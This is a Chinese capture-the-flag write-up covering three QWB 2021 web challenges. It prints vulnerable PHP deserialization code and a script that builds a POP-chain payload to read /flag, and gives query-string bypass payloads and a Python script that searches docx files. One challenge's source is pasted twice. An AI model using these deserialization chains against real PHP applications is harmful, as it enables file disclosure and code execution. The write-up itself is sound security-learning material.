强网杯2021部分web wp

0x01 pop_master

打开题目


include"class.php";
//class.php.txt
highlight_file(__FILE__);
$a=$_GET['pop'];
$b=$_GET['argv'];
$class=unserialize($a);
$class->XXXXXX($b);  //随机生成6位长度的函数

根据提示信息 下载源码

我滴个乖乖 2M多的链 16万行

class NXlGlW{
    public $hGYbeeG;
    public function HRD4CW($y3Cae){
		eval($y3Cae);

    }
    public function C3akk9($MSL6W){
		eval($MSL6W);

    }
}


class qAARvi{
    public $E0cUWyC;
    public function GlSPMd($XHiV9){
		$this->BrLVt = "GAVzp";
		if(method_exists($this->E0cUWyC, 'YAF1Wt')) $this->E0cUWyC->YAF1Wt($XHiV9);
		if(method_exists($this->E0cUWyC, 'KfVcH5')) $this->E0cUWyC->KfVcH5($XHiV9);

    }
    public function olsElL($t43I8){
		$this->v35pY = "TNiWd";
		eval($t43I8);

    }
}
//......

函数名 类名随机 生成 最总链成 用eval 执行system(“cat /flag”);

太菜了不会写脚本 用手工找几十个就行了,脚本可以看下大佬们的参考下
强网杯2021部分web wp_第1张图片

0x02 [强网先锋]赌徒

在这里插入图片描述
打开网站 看到一串提示信息,
www.zip 下载源码

<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
	
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';
	
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
	
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi = new  Start();
}

?>
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
	
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';
	
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
	
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi = new  Start();
}

?>

很明显反序列化 pop链 最终执行 Get_hint file_get_contents 获得flag

__invoke()  //当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
__get()  //当我们试图获取一个不可达属性时(比如private),类会自动调用__get函数。
start=》wakeup=》sayhello =》Info=》toString=》this->room=》get =>room=》invoke


class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
}
class info
{
    public $promise;
}
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';

}
$info = new info();
$start = new start();
$room = new Room();
$start->name = $info;
$start->name->file['filename']=$room;
$room->a = new room();
echo serialize($start);
/*
$st=new Start();
$st->name=new info();
$st->name->file['filename']=new Room();
$st->name->file['filename']->a=new Room();
print_r(serialize($st));
*/

记得要把 开头的hi 去掉在解码啊~

0x03 [强⽹先锋]寻宝

key1 常见绕过

ppp[number1]=6666a&ppp[number2]=1e10&ppp[number3]=61823470&ppp[number4]=0abcdef&ppp[number5]=null

第二个文件下载了,提示如下:
Mr.Smith先生和Tang在5月份的时候在一个画展进行了接触,并且在某些地方写下了一些东西
我们将该月有关画展的信息做了汇总,希望你能够从中获取一些信息

压缩包用可以分段下载器都可以下载

文件中有五个图片 干扰我好久

最终发现key2以明文形式存在 docx中

key2

贴出寻找脚本

import os
from docx import Document
path = r"C:\Users\xxxxx\Desktop\five_month"

str_to_search = "KEY2"#input("请输入要搜索的字段:")

def search_str_in_paragraph(str_to_search, paragraph):
    
    str_index = paragraph.text.index(str_to_search)

    return str_index

for root, dirs, files in os.walk(path, topdown=False):
    for file in files:
        filename = file.split(".")[0]
        ext = file.split(".")[1]
        if ext == "docx":
            doc = Document(os.path.join(root, file))
            for paragraph in doc.paragraphs:
                if str_to_search in paragraph.text:
                    str_index = search_str_in_paragraph(str_to_search, paragraph)
                    print(paragraph.text[str_index-10:str_index+10], "-----", filename, "-----", os.path.join(root, file))

在这里插入图片描述

在这里插入图片描述
强网杯2021部分web wp_第2张图片

你可能感兴趣的:(CTF,web,安全,php,python,unctf)